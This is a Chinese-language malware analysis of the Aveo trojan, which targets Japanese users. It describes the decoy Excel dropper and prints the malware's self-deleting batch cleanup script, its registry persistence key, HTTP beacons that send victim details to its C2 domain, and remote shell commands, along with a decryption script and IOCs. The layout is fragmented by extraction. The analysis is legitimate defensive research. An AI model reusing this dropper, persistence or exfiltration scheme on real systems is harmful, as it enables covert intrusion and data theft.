Aveo惡意軟體分析

Palo Alto Networks 發現了一個名為 Aveo 的惡意軟體家族，它針對日語用戶開發。Aveo 的名字來自於其二進位文件中的嵌入式調試字元串。Aveo 惡意軟體家族與 ForrmerFirstRAT 惡意軟體家族有密切的聯繫，二者都針對日語用戶。Aveo 會偽裝成 Microsoft Excel 文檔，並在執行時拋出誘餌文件。誘餌文檔與埼玉工業大學 Ido 實驗室的研究有關。執行後，Aveo 可以接收多種命令，這將允許攻擊者完全控制感染主機。

部署

Aevo 的樣本會偽裝成 Microsoft Excel 文檔，如下圖所示。值得注意的是，malware.exe 只是一個佔位符，原文件名未知。

該可執行文件其實是一個 WinRAR 的自解壓可執行文件，它會在執行時拋出誘餌文檔和 Aveo 木馬來運行。下圖就是拋出的誘餌文檔，在運行之後打開：

這個誘餌文檔是關於 Ido 實驗室 2016 年研究立項的信息。該文件列出了 16 名參加 CAVE 的名單，包括名字、單位以及郵件地址。這個文檔用日語書寫，文件名也是日文

CAVE研究會參加者.xls

，這些都表明該惡意軟體是針對日語用戶的。此外，Aveo 和 FormerFirstRAT 家族的相似性將會在稍後討論，這個討論將進一步支持該惡意軟體是針對日語用戶的。

基礎設施

Aveo 木馬配置了以下域名來進行 HTTP 通信：

snoozetime

[.]

info

jack.ondo@mail.com 最早在 2015 年 5 月就註冊了，自那時起，該郵箱已經和以下三個 IP 地址關聯上了：

104

.202

.173

[.]

82
107

.180

.36

[.]

179
50

.63

.202

[.]

38

所有這些 IP 地址都位於美國境內。

從 snoozetime[.]info 的 WHOIS 信息來看，註冊郵箱為jack.ondo@mail[.]com，註冊名為aygt5ruhrj aygt5ruhrj gerhjrt。根據這兩條線索進行拓展：

bluepaint

[.]

info

coinpack

[.]

info

7

b7p

[.]

info

donkeyhaws

[.]

info

europcubit

[.]

com

jhmiyh

.ny

@

gmail[.]com

844148030

@qq[.]com

惡意軟體分析

在自解壓可執行文件運行後，一系列的文件釋出到文件系統中，其執行流如下：

當 mshelp32.exe 可執行程序運行時，首先讀取setting32.ini 文件，其中包含著誘餌文檔的名字。這一信息被用來構建一個批處理腳本，如下：

@echo off

copy

"CAVE研究會參加者.xls"

"C:Documents and SettingsAdministratorDesktop8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls"

/Y

del

"CAVE研究會參加者.xls"

/F /Q

del

mshelp32.exe /F /Q

del

setting32.ini /F /Q

del

"C:Documents and SettingsAdministratorDesktop8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe"

/F /Q

del

%

0

/F /Q

該批處理腳本在一個新的進程中執行，在 Aveo 運行、誘餌文檔釋放後執行清理工作。

Aveo 惡意軟體家族

Aveo 惡意軟體會在開始運行一個安裝程序，該程序會複製自身到以下位置：%APPDATA%MMCMMC.exe如果因為某種原因，%APPDATA%MMC 目錄不能被創建，Aveo 將會使用 %TEMP% 來代替 %APPDATA%。惡意軟體自身複製完成後，將會在新的進程中以原文件名為參數執行 MMC.exe。當執行時，如果提供了這單個參數，惡意軟體將會刪除掉制定路徑內的文件。安裝完成後，Aveo 將會提取以下受害人信息通過 HTTP 傳到遠程控制伺服器上：

Unique victim

hash

IP Address
Microsoft Windows version
Username
ANSI code page identifier

這個信息被送到 snoozetime[.]info上，像下面的 HTTP 請求樣例：

GET

/index.php?id=35467&1=ySxlp03YGm0-&2=yiFi6hjbFHf9UtL44RPQ&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g--

HTTP/1.1

Accept

: */*

User-Agent

: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host

: snoozetime[.]info

Cache-Control

: no-cache

惡意軟體使用了 RC4 來對數據進行加密，使用 hello作為密鑰。如下圖所示，Aveo 和 FormerFirstRAT 的加密部分幾乎是相同的，只s是演算法和密鑰變了。

可以通過以下代碼來解密 HTTP 中傳輸的數據：

import

base64

from

binascii

import

*

from

struct

import

*

from

wincrypto

import

CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt

CALG_RC4 =

0x6801

CALG_MD5 =

0x8003

def

decrypt

(data)

:

md5_hasher = CryptCreateHash(CALG_MD5)
CryptHashData(md5_hasher,

"hello"

)
generated_key = CryptDeriveKey(md5_hasher, CALG_RC4)
decrypted_data = CryptDecrypt(generated_key, data)

return

decrypted_data

for

a

in

"index.php?id=35467&1=niBo9x/bFG4-&2=yi9i6hjbAmD5TNPu5A--&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g--"

.split(

"&"

)[

1

:]:
k,v = a.split(

"="

)
decrypted = decrypt(base64.b64decode(v.replace(

"-"

,

"="

)))

print

"[+] Parameter {} Decrypted: {}"

.format(k, decrypted)

運行以上代碼會產生以下結果：

[+]

Parameter

1

Decrypted

:

e8836687

[+]

Parameter

2

Decrypted

: 172

.16

.95

.184

[+]

Parameter

4

Decrypted

: 6

.1

.7601

.2

.1

[+]

Parameter

5

Decrypted

:

Josh

Grunzweig

[+]

Parameter

6

Decrypted

: 1252

在得到受害者信息後，惡意軟體會按照預期返回 OK。之後 Aveo 將會產生一個新的線程來負責處理 C&C 伺服器的命令，以及請求產生的互動式 Shell。Aveo 對註冊表進行以下設置，以指向惡意軟體的路徑，從而保證重新啟動後惡意軟體仍然可以持久工作：HKCUsoftwaremicrosoftwindowscurrentversion
unmsnetbridge然後命令處理程序進入輪詢等待，Aveo 會從 C&C 伺服器接收命令。雖然 Aveo 在等待響應，它也會執行隨機延遲，延遲時間在 0 到 3276 毫秒之間。如果 C&C 伺服器返回 toyota，會將間隔設置為 60 秒。Aveo 可以接收以下命令：

1.執行交互 Shell 命令

2.獲取文件屬性

3.寫入文件

4.讀取文件

5.驅動器列表

6.對路徑執行 DIR 命令

以下請求顯示了 C&C 伺服器發送 ipconfig 命令到 Aveo 的過程：

C&C 請求

GET

/index.php?id=35468&1=niBo9x/bFG4-

HTTP/1.1

Accept

: */*

User-Agent

: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host

: snoozetime[.]info

Cache-Control

: no-cache

HTTP/1.0

200

OK

Content-Type

: text/html; charset=utf-8

Content-Length

: 11

Server

: Werkzeug/0.11.10 Python/2.7.5

Date

: Wed, 10 Aug 2016 16:00:11 GMT

xca89

xb4J

x82B

?

xa5

x05

xe8

[Decrypted]

1

ipconfig

Aveo 響應

POST

/index.php?id=35469&1=niBo9x/bFG4-

HTTP/1.1

Accept

: */*

User-Agent

: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host

: snoozetime[.]info

Content-Length

: 1006

Cache-Control

: no-cache

xca

x38

x39

xb4

x4a

x82

x42

x3f

xa5

x05

xe8

xdb

xda

x74

x8b

x79

x39

x46

xf2

x42

x1f

xcd

x39

xf3

x65

x1d

xda

x49

x40

x6c

x5e

x6e

xab

x79

xc2

x44

xc3

xb0

x12

xfd

xe2

x84

x67

x0d

xa5

xd3

x50

x2d

x1c

x31

x4a

x9e

xcb

x3d

x08

xe6

x1b

x04

x85

xbf

x11

x0e

x96

x63

xcf

x71

xfe

xe4

x97

x2a

xdc

x12

x23

x4d

xcb

x0f

x93

x30

xbc

xa0

xc8

x4e

x4e

xd8

xdb

x33

xa2

xbe

xff

x5e

x89

x22

xb9

x16

xd1

xf0

x60

x71

x64

x7a

x10

xb8

x78

x76

xe5

x08

x90

x46

x30

xa3

xe2

x4e

xdc

x98

x11

x27

x62

x38

x00

xb4

x54

x6d

xd7

x5b

x19

x5f

x19

xb8

xd1

xf5

xc1

x9b

x97

xda

x84

x2c

xdd

x2d

x97

x0a

x69

x51

xd9

x31

x77

x4a

xe2

x7f

x5e

xc5

xaf

x02

x3c

x69

x9c

x5f

x94

x3e

x0c

x25

xce

x63

xa9

x43

xff

x34

x25

x42

x95

xa9

x1f

xaa

xdf

x2b

xa7

xb1

xc0

x3

[Truncated]

[Decrypted]

1

ipconfig

Windows

IP

Configuration

Ethernet

adapter

Bluetooth

Network

Connection

:

Media

State

. . . . . . . . . . . :

Media

disconnected

Connection-specific

DNS

Suffix

. :

[Truncated]

結論

Aveo 與 FormerFirstRAT 在多個特徵上都是一致的，包括加密模塊、代碼重用和 C&C 功能。正如前面討論的 FormerFirstRAT 樣本，這個惡意軟體家族看起來也是針對日語用戶。使用自解壓文件的 WinRAR 釋放誘餌文檔和 Aveo 的惡意軟體副本以及清理腳本。Palo Alto Networks 的客戶已經免受以下威脅：

1.AutoFocus 已經對這種威脅創建了跟蹤和監控

2.WildFire 歸類 Aveo 到惡意程序

3.C&C 域名列入 Threat Prevention 攔截黑名單

IOC

SHA256 哈希

9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2
8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d

C&C 域名

snoozetime

[.]

info

註冊表鍵值

HKCUsoftwaremicrosoftwindowscurrentversion
unmsnetbridge

文件路徑

%

APPDATA

%

MMC

MMC

.exe

%

TEMP

%

MMC

MMC

.exe

*參考文章來源：

researchcenter

，由Avenger編譯，轉載請註明來自

FreeBuf.COM

。

請您繼續閱讀更多來自 FreeBuf 的精彩文章: